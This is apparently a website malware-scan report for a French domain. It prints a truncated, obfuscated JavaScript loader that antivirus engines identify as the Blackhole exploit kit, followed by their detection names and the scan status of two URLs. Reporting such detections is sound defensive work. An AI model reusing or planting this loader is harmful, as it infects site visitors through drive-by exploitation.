Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d(
... 3522 bytes are skipped ...45(3d(89(82(8b(49(3d(82(8b(81(3d(46(3d(46(58(2a(27(9a(2a(27(86(83(3d(45(8b(7e(93(86(84(7e(91(8c(8f(4b(80(8c(8c(88(86(82(62(8b(7e(7f(89(82(81(46(2a(27(98(2a(27(86(83(45(64(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(46(5a(5a(52(52(46(98(9a(82(89(90(82(98(70(82(91(60(8c(8c(88(86(82(45(44(93(86(90(86(91(82(81(7c(92(8e(44(49(3d(44(52(52(44(49(3d(44(4e(44(49(3d(44(4c(44(46(58(2a(27(2a(27(8e(88(4d(56(45(46(58(2a(27(9a(2a(27(9a".split(oismz);sgyb="";mmyzf("mCharCode");ktcw(""+sgyb);}Antivirus reports:- AntiVir
- JS/Blacole.EB.182
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Bkav
- MW.Clodfc8.Trojan.21b7
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1030
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.clinouest.fr/test404page.js | 404 Not Found
Content-Length: 212
Content-Type: text/html | clean |
http://www.clinouest.fr/AQ/index.html | 401 Authorization Required
Content-Length: 401
Content-Type: text/html | clean |
